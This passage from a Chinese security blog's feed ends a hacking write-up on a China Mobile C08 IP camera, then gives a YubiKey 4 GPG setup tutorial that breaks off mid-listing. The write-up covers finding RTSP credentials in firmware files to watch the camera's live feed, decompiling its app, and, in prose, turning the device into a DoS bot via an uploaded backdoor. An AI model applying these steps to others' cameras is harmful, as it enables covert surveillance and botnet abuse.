class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">~ <span class="comment"># ifconfig</span></span><br><span class="line">eth2 Link encap:Ethernet HWaddr E0:50:8B:35:74:02</span><br><span class="line"> inet addr:192.168.8.236 Bcast:192.168.8.255 Mask:255.255.255.0</span><br><span class="line"> UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1</span><br><span class="line"> RX packets:8895 errors:0 dropped:234 overruns:0 frame:0</span><br><span class="line"> TX packets:35955 errors:0 dropped:0 overruns:0 carrier:0</span><br><span class="line"> collisions:0 txqueuelen:1000</span><br><span class="line"> RX bytes:894282 (873.3 KiB) TX bytes:43996613 (41.9 MiB)</span><br><span class="line"></span><br><span class="line">lo Link encap:Local Loopback</span><br><span class="line"> inet addr:127.0.0.1 Mask:255.0.0.0</span><br><span class="line"> UP LOOPBACK RUNNING MTU:16436 Metric:1</span><br><span class="line"> RX packets:73 errors:0 dropped:0 overruns:0 frame:0</span><br><span class="line"> TX packets:73 errors:0 dropped:0 overruns:0 carrier:0</span><br><span class="line"> collisions:0 txqueuelen:0</span><br><span class="line"> RX bytes:15590 (15.2 KiB) TX bytes:15590 (15.2 KiB)</span><br><span class="line"></span><br><span class="line">~ <span class="comment">#</span></span><br></pre></td></tr></table></figure><!--定位运行的服务与开放的端口号由于 `netstat` 和 `lsof -i` 命令在这系统都用不了,所有只能从 `/proc/` 目录里手动收集原始信息再解码成可读信息。--><!----><h3 id="5-4-找出-RTSP-用户名与密码"><a href="#5-4-找出-RTSP-用户名与密码" class="headerlink" title="5.4 找出 RTSP 用户名与密码"></a>5.4 找出 RTSP 用户名与密码</h3><p>使用 <a href="https://www.videolan.org/" target="_blank" rel="noopener">VLC media player</a> 连接到 IPCamera 的 RTSP 服务端,发现是个需要使用用户名和密码登陆认证的服务。</p><p><img src="//files.iternull.com/images/2017-12-26_01-0015.png" alt=""></p><p>使用 IDA Pro 对系统运行的几个私有程序进行反编译后发现配置文件大多都保存在 <code>/mnt/</code> 目录下。于是在 <code>/mnt/pd/product.zip</code> 文件里找到了几个账号。</p><p><img src="//files.iternull.com/images/2017-12-26_01-0016.png" alt=""></p><p>尝试这些账号登陆服务发现 <code>admin</code> 账号是可用的,并成功的连接到了 IPCamera 的 RTSP 服务。在 VLC media player 里能够直接看到实时视频与音频。</p><p><img src="//files.iternull.com/images/2017-12-26_01-0017.png" alt=""></p><h3 id="5-5-嗅探-5000-端口运行的服务"><a href="#5-5-嗅探-5000-端口运行的服务" class="headerlink" title="5.5 嗅探 5000 端口运行的服务"></a>5.5 嗅探 5000 端口运行的服务</h3><p>使用 NetCat 连接到 <code>5000</code> 端口,连接后并不返回任何信息,尝试发送字符信息也并未回复,且发送到一定字节信息后自动了关闭连接。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ nc 192.168.8.236 5000</span><br></pre></td></tr></table></figure><p>使用 <a href="https://github.com/0x90/miranda-upnp" target="_blank" rel="noopener">miranda-upnp</a> 工具扫描局域网内的运行着 UPnP 的设备也为发现有 IPCamera 的信息。目前未得出此端口运行的是什么服务。猜测可能是进行局域网内远程信息配置相关的。</p><h2 id="6-APP-逆向"><a href="#6-APP-逆向" class="headerlink" title="6 APP 逆向"></a>6 APP 逆向</h2><p>APP 里可能会保留部分有用的信息,这里尝试对其简单的分析。</p><h3 id="6-1-解包程序逆向代码"><a href="#6-1-解包程序逆向代码" class="headerlink" title="6.1 解包程序逆向代码"></a>6.1 解包程序逆向代码</h3><p>使用 Apktool 解包 <code>.apk</code> 文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ apktool d hhy.apk</span><br></pre></td></tr></table></figure><p>使用 dex2jar 将 <code>.dex</code> 文件转换成 <code>.class</code> 文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> hhy/assets/</span><br><span class="line">$ dex2jar classes.dex</span><br></pre></td></tr></table></figure><p>使用 <a href="http://jd.benow.ca/" target="_blank" rel="noopener">JD-GUI</a> 查看反编译后的代码</p><p><img src="//files.iternull.com/images/2017-12-26_01-0018.png" alt=""></p><p>这里有找到 RTSP 相关的内容</p><h3 id="6-2-APP-网络通信分析"><a href="#6-2-APP-网络通信分析" class="headerlink" title="6.2 APP 网络通信分析"></a>6.2 APP 网络通信分析</h3><p>可以使用 <a href="https://portswigger.net/burp" target="_blank" rel="noopener">Burp Suite</a> 去分析/修改 APP 网络通信的数据内容。这里不做讲解。</p><h2 id="7-漏洞利用"><a href="#7-漏洞利用" class="headerlink" title="7 漏洞利用"></a>7 漏洞利用</h2><h3 id="7-1-作为直播摄像头"><a href="#7-1-作为直播摄像头" class="headerlink" title="7.1 作为直播摄像头"></a>7.1 作为直播摄像头</h3><p>这个 IPCamera 上运行着 RTSP 服务,我们可以尝试把视频流导入到 <a href="https://obsproject.com/" target="_blank" rel="noopener">OBS</a> 里,作为直播摄像头。</p><p>在 OBS 里添加 RTSP 作为媒体源</p><p><img src="//files.iternull.com/images/2017-12-26_01-0019.png" alt=""></p><p><img src="//files.iternull.com/images/2017-12-26_01-0020.png" alt=""></p><h3 id="7-2-作为-DoS-肉鸡"><a href="#7-2-作为-DoS-肉鸡" class="headerlink" title="7.2 作为 DoS 肉鸡"></a>7.2 作为 DoS 肉鸡</h3><p>这个 IPCamera 还有空余存储,<code>/mnt/</code> 目录下也是可写的,并且系统内置可使用的 <code>tftp</code> <code>tftpd</code> 程序,你可以编写自己后门程序编译后通过 FTP 传输到设备上。</p><hr><ul><li>注: 在最新版本的固件里已经修复了这些漏洞</li></ul>]]></content>
<summary type="html">
<p><a href="http://www.hehuiyan.com/" target="_blank" rel="noopener">和慧眼</a>是中国移动推出的一个摄像网络监控服务平台,旗下有多款智能摄像头设备。这里我们研究使用的是 C08 型号的。<br>IPCamera 与 WebCam 的其中一个区别是 IPCamera 不带有 Web 控制台,你只能使用厂商提供的 APP 控制设备,无法在局域网内通过网页控制设备。<br>并且 IPCamera 基本上都要连接互联网使用厂商的云平台,这意味着你的数据都会传输到云端,还可能需要再付费租用它的云端平台功能使用权。<br>
</summary>
<category term="Hardware" scheme="https://blog.iternull.com/tags/Hardware/"/>
<category term="Reverse Engineering" scheme="https://blog.iternull.com/tags/Reverse-Engineering/"/>
<category term="Hacking" scheme="https://blog.iternull.com/tags/Hacking/"/>
<category term="IPCamera" scheme="https://blog.iternull.com/tags/IPCamera/"/>
</entry>
<entry>
<title>YubiKey 4 PGP 功能使用教程</title>
<link href="https://blog.iternull.com/posts/2017/06/03/YubiKey-4-GPG-Tutorial.html"/>
<id>https://blog.iternull.com/posts/2017/06/03/YubiKey-4-GPG-Tutorial.html</id>
<published>2017-06-02T16:23:15.000Z</published>
<updated>2017-06-05T19:27:00.990Z</updated>
<content type="html"><![CDATA[<p><a href="https://www.yubico.com/" target="_blank" rel="noopener">YubiKey</a> 是一款用于安全认证的硬件工具,其中的 YubiKey 4, YubiKey 4 Nano, YubiKey 4C, YubiKey NEO, YubiKey NEO-n,这些产品型号是包含 OpenPGP Card 功能的。</p><p>你可将你的私钥移动到 YubiKey 里,在需要使用的时候插上,而不必担心私钥泄露或被恶意程序盗取,并且支持在多种操作系统上使用。</p><a id="more"></a><h2 id="1、生成密钥对"><a href="#1、生成密钥对" class="headerlink" title="1、生成密钥对"></a>1、生成密钥对</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --gen-key</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 2.0.30; Copyright (C) 2015 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">Please select what kind of key you want:</span><br><span class="line"> (1) RSA and RSA (default)</span><br><span class="line"> (2) DSA and Elgamal</span><br><span class="line"> (3) DSA (sign only)</span><br><span class="line"> (4) RSA (sign only)</span><br><span class="line">Your selection? 1 // 输入 1 选择默认的 RSA 加密算法</span><br><span class="line">RSA keys may be between 1024 and 4096 bits long.</span><br><span class="line">What keysize <span class="keyword">do</span> you want? (2048) 4096</span><br><span class="line">Requested keysize is 4096 bits</span><br><span class="line">Please specify how long the key should be valid.</span><br><span class="line"> 0 = key does not expire</span><br><span class="line"> <n> = key expires <span class="keyword">in</span> n days</span><br><span class="line"> <n>w = key expires <span class="keyword">in</span> n weeks</span><br><span class="line"> <n>m = key expires <span class="keyword">in</span> n months</span><br><span class="line"> <n>y = key expires <span class="keyword">in</span> n years</span><br><span class="line">Key is valid <span class="keyword">for</span>? (0) // 直接回车选择 0 默认永不过期</span><br><span class="line">Key does not expire at all</span><br><span class="line">Is this correct? (y/N) y // 输入 y 确定 下一步</span><br><span class="line"></span><br><span class="line">GnuPG needs to construct a user ID to identify your key.</span><br><span class="line"></span><br><span class="line">Real name: Test User // 输入你的姓名</span><br><span class="line">Email address: <span class="built_in">test</span>@example.com // 输入你的邮箱</span><br><span class="line">Comment: // 输入你的附加信息,可以是你的网络 ID 名称,或者直接回车跳过</span><br><span class="line">You selected this USER-ID:</span><br><span class="line"> <span class="string">"Test User <[email protected]>"</span></span><br><span class="line"></span><br><span class="line">Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o // 输入 o 回车后会要求你设置一个私钥的密码</span><br><span class="line">You need a Passphrase to protect your secret key.</span><br><span class="line"></span><br><span class="line">We need to generate a lot of random bytes. It is a good idea to perform</span><br><span class="line">some other action (<span class="built_in">type</span> on the keyboard, move the mouse, utilize the</span><br><span class="line">disks) during the prime generation; this gives the random number</span><br><span class="line">generator a better chance to gain enough entropy.</span><br><span class="line">We need to generate a lot of random bytes. It is a good idea to perform</span><br><span class="line">some other action (<span class="built_in">type</span> on the keyboard, move the mouse, utilize the</span><br><span class="line">disks) during the prime generation; this gives the random number</span><br><span class="line">generator a better chance to gain enough entropy.</span><br><span class="line">gpg: key A8C37A46 marked as ultimately trusted</span><br><span class="line">public and secret key created and signed.</span><br><span class="line"></span><br><span class="line">gpg: checking the trustdb</span><br><span class="line">gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model</span><br><span class="line">gpg: depth: 0 valid: 2 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 2u</span><br><span class="line">pub 4096R/F891791F 2017-05-29</span><br><span class="line"> Key fingerprint = 628C 7B5D D284 224A 3321 4369 BC71 9F68 F891 791F</span><br><span class="line">uid [ultimate] Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 4096R/46D4D220 2017-05-29</span><br></pre></td></tr></table></figure><h2 id="2、添加验证密钥"><a href="#2、添加验证密钥" class="headerlink" title="2、添加验证密钥"></a>2、添加验证密钥</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --expert --edit-key F891791F</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 2.0.30; Copyright (C) 2015 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">Secret key is available.</span><br><span class="line"></span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">[ultimate] (1). Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> addkey</span><br><span class="line">This key is not protected.</span><br><span class="line">Please select what kind of key you want:</span><br><span class="line"> (3) DSA (sign only)</span><br><span class="line"> (4) RSA (sign only)</span><br><span class="line"> (5) Elgamal (encrypt only)</span><br><span class="line"> (6) RSA (encrypt only)</span><br><span class="line"> (7) DSA (<span class="built_in">set</span> your own capabilities)</span><br><span class="line"> (8) RSA (<span class="built_in">set</span> your own capabilities)</span><br><span class="line">Your selection? 8</span><br><span class="line"></span><br><span class="line">Possible actions <span class="keyword">for</span> a RSA key: Sign Encrypt Authenticate</span><br><span class="line">Current allowed actions: Sign Encrypt</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"> (E) Toggle the encrypt capability</span><br><span class="line"> (A) Toggle the authenticate capability</span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? A</span><br><span class="line"></span><br><span class="line">Possible actions <span class="keyword">for</span> a RSA key: Sign Encrypt Authenticate</span><br><span class="line">Current allowed actions: Sign Encrypt Authenticate</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"> (E) Toggle the encrypt capability</span><br><span class="line"> (A) Toggle the authenticate capability</span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? S</span><br><span class="line"></span><br><span class="line">Possible actions <span class="keyword">for</span> a RSA key: Sign Encrypt Authenticate</span><br><span class="line">Current allowed actions: Encrypt Authenticate</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"> (E) Toggle the encrypt capability</span><br><span class="line"> (A) Toggle the authenticate capability</span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? E</span><br><span class="line"></span><br><span class="line">Possible actions <span class="keyword">for</span> a RSA key: Sign Encrypt Authenticate</span><br><span class="line">Current allowed actions: Authenticate</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"> (E) Toggle the encrypt capability</span><br><span class="line"> (A) Toggle the authenticate capability</span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? Q</span><br><span class="line">RSA keys may be between 1024 and 4096 bits long.</span><br><span class="line">What keysize <span class="keyword">do</span> you want? (2048) 4096</span><br><span class="line">Requested keysize is 4096 bits</span><br><span class="line">Please specify how long the key should be valid.</span><br><span class="line"> 0 = key does not expire</span><br><span class="line"> <n> = key expires <span class="keyword">in</span> n days</span><br><span class="line"> <n>w = key expires <span class="keyword">in</span> n weeks</span><br><span class="line"> <n>m = key expires <span class="keyword">in</span> n months</span><br><span class="line"> <n>y = key expires <span class="keyword">in</span> n years</span><br><span class="line">Key is valid <span class="keyword">for</span>? (0)</span><br><span class="line">Key does not expire at all</span><br><span class="line">Is this correct? (y/N) y</span><br><span class="line">Really create? (y/N) y</span><br><span class="line">We need to generate a lot of random bytes. It is a good idea to perform</span><br><span class="line">some other action (<span class="built_in">type</span> on the keyboard, move the mouse, utilize the</span><br><span class="line">disks) during the prime generation; this gives the random number</span><br><span class="line">generator a better chance to gain enough entropy.</span><br><span class="line"></span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span><br><span class="line">[ultimate] (1). Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> q</span><br><span class="line">Save changes? (y/N) y</span><br></pre></td></tr></table></figure><h2 id="3、备份密钥"><a href="#3、备份密钥" class="headerlink" title="3、备份密钥"></a>3、备份密钥</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gpg --armor --output public-key.asc --<span class="built_in">export</span> F891791F // 导出公钥到文件</span><br><span class="line">gpg --armor --output private-key.asc --<span class="built_in">export</span>-secret-keys F891791F // 导出私钥到文件</span><br><span class="line">gpg --armor --output subkeys-key.asc --<span class="built_in">export</span>-secret-subkeys F891791F // 导出子钥到文件</span><br></pre></td></tr></table></figure><h2 id="4、设置-OpenPGP-卡"><a href="#4、设置-OpenPGP-卡" class="headerlink" title="4、设置 OpenPGP 卡"></a>4、设置 OpenPGP 卡</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --card-edit</span><br><span class="line"></span><br><span class="line">Application ID ...: D2760001240102000060000000420000</span><br><span class="line">Version ..........: 2.1</span><br><span class="line">Manufacturer .....: Yubico</span><br><span class="line">Serial number ....: 00000042</span><br><span class="line">Name of cardholder: [not <span class="built_in">set</span>]</span><br><span class="line">Language prefs ...: [not <span class="built_in">set</span>]</span><br><span class="line">Sex ..............: unspecified</span><br><span class="line">URL of public key : [not <span class="built_in">set</span>]</span><br><span class="line">Login data .......: [not <span class="built_in">set</span>]</span><br><span class="line">Signature PIN ....: forced</span><br><span class="line">Key attributes ...: 2048R 2048R 2048R</span><br><span class="line">Max. PIN lengths .: 127 127 127</span><br><span class="line">PIN retry counter : 3 0 3</span><br><span class="line">Signature counter : 0</span><br><span class="line">Signature key ....: [none]</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line">General key info..: [none]</span><br><span class="line"></span><br><span class="line">gpg/card> admin // 进入管理员模式</span><br><span class="line">Admin commands are allowed</span><br><span class="line"></span><br><span class="line">gpg/card> passwd // 设置密码</span><br><span class="line">gpg: OpenPGP card no. D2760001240102000060000000420000 detected</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - <span class="built_in">set</span> the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line">Your selection? 1 // 输入 1 选择设置普通 PIN 码,默认的 PIN 码为 123456 如果是新设备或重置后的都是默认码。</span><br><span class="line">PIN changed. // 设置时会先要求你输入普通 PIN 码的当前的密码,然后是设置新的 PIN 码,再是新的 PIN 码的二次确认。如果当前的 PIN 码输错 3 次就会被锁。</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - <span class="built_in">set</span> the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line">Your selection? 3 // 输入 3 选择设置 Admin PIN 码,默认的 PIN 码为 12345678 如果是新设备或重置后的都是默认码。</span><br><span class="line">PIN changed. // 设置时会先要求你输入 Admin PIN 码的当前的密码,然后是设置新的 PIN 码,再是新的 PIN 码的二次确认。如果当前的 PIN 码输错 3 次就会被锁。</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - <span class="built_in">set</span> the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line">Your selection? 2 // (可选)输入 2 选择设置 unblock PIN 码,也就解锁码,用于在普通 PIN 码被锁后解锁并重置新的普通 PIN 码。unblock PIN 码只能用于解锁普通 PIN 码,无法用于 Admin PIN 码。</span><br><span class="line">PIN unblocked and new PIN <span class="built_in">set</span>. // 设置时会先要求你输入 Admin PIN 码的当前的密码,然后是设置新的 unblock PIN 码,再是新的 unblock PIN 码的二次确认。</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - <span class="built_in">set</span> the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line">Your selection? q // 输入 q 退出密码设置</span><br><span class="line"></span><br><span class="line">gpg/card> name // 设置姓名</span><br><span class="line">Cardholder<span class="string">'s surname: User // 持卡人的姓</span></span><br><span class="line"><span class="string">Cardholder'</span>s given name: Test // 持卡人的名字</span><br><span class="line"></span><br><span class="line">gpg/card> lang // 设置语言</span><br><span class="line">Language preferences: en</span><br><span class="line"></span><br><span class="line">gpg/card> sex // 设置性别 M 为男性 F 为女性</span><br><span class="line">Sex ((M)ale, (F)emale or space): m</span><br><span class="line"></span><br><span class="line">gpg/card> url // 设置公钥的网络链接</span><br><span class="line">URL to retrieve public key: https://www.example.com/public-key.asc // 链接地址</span><br><span class="line"></span><br><span class="line">gpg/card> login // 设置用户名</span><br><span class="line">Login data (account name): <span class="built_in">test</span></span><br><span class="line"></span><br><span class="line">gpg/card> </span><br><span class="line"></span><br><span class="line">Application ID ...: D2760001240102000060000000420000</span><br><span class="line">Version ..........: 2.1</span><br><span class="line">Manufacturer .....: Yubico</span><br><span class="line">Serial number ....: 00000042</span><br><span class="line">Name of cardholder: Test User</span><br><span class="line">Language prefs ...: en</span><br><span class="line">Sex ..............: male</span><br><span class="line">URL of public key : https://www.example.com/public-key.asc</span><br><span class="line">Login data .......: <span class="built_in">test</span></span><br><span class="line">Signature PIN ....: forced</span><br><span class="line">Key attributes ...: 2048R 2048R 2048R</span><br><span class="line">Max. PIN lengths .: 127 127 127</span><br><span class="line">PIN retry counter : 3 3 3 // 3 3 3 分别表示普通 PIN 码、unblock PIN 码、Admin PIN 码的输入错误计数器,默认为 3 输错一次减 1 ,减到 0 会被锁,被锁之前输入正确的 PIN 码会自动还原计数器。</span><br><span class="line">Signature counter : 0</span><br><span class="line">Signature key ....: [none]</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line">General key info..: [none]</span><br><span class="line"></span><br><span class="line">gpg/card> quit // 退出 OpenPGP 卡设置</span><br></pre></td></tr></table></figure><ul><li>注:在 Yubikey 4 中引入了一个新功能,当用户输入正确的 PIN 码和 <strong>触摸硬件</strong> 后才会进行签名、解密或身份验证操作。具体参考 <a href="https://developers.yubico.com/PGP/Card_edit.html" target="_blank" rel="noopener">YubiKey 4 touch</a> 里的内容。</li></ul><h2 id="5、移动密钥到-YubiKey-4"><a href="#5、移动密钥到-YubiKey-4" class="headerlink" title="5、移动密钥到 YubiKey 4"></a>5、移动密钥到 YubiKey 4</h2><ul><li>注:OpenPGP Card 是支持在自身硬件上直接生成密钥对的,但多数使用 PGP 非对称加密的用户都有自己的密钥所以这里使用移动已有密钥到 YubiKey 里。直接在硬件上生成密钥对是在 admin 模式下使用 <code>generate</code> 命令,生成的密钥是无法导出备份的!</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span 